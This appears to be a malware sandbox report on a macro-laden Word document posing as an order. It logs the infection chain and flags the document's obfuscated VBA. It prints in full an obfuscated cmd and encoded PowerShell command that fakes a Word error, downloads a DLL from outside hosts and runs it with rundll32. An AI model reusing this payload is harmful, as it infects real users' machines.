Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'...............]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3...............]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?...............]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K...............]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W...............]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c...............]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o...............]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{...............]..j.....Im...............#.............}..v....h.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j.... .................#.............}..v............0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................]..j.....Im...............#.............}..v.....#......0.N.....................~....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....#................#.............}..v....@$......0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................]..j.....Im...............#.............}..v.....*......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....+................#.............}..v.... ,......0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................]..j.....Im...............#.............}..v....p1......0.N.....................r....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....(2................#.............}..v.....2......0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ .......]..j.....Im...............#.............}..v....86......0.N.............hFm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....6................#.............}..v....p7......0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................=..j....E.h...............#.............}..v....h}......0.N...............m............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................=..j....E.h...............#.............}..v............0.N...............m............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2089799072.0000000001F40000.00000002.00000001.sdmp
Source: Order.802796810.doc Initial sample: OLE summary subject = bandwidth-monitored strategize Investment Account Well Small full-range Product

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: Order.802796810.doc Stream path 'Macros/VBA/Ty191wz8hynv3fl' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Ty191wz8hynv3fl Name: Ty191wz8hynv3fl
Document contains an embedded VBA with many randomly named variables
Source: Order.802796810.doc Stream path 'Macros/VBA/Ty191wz8hynv3fl' : High entropy of concatenated variable names
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAE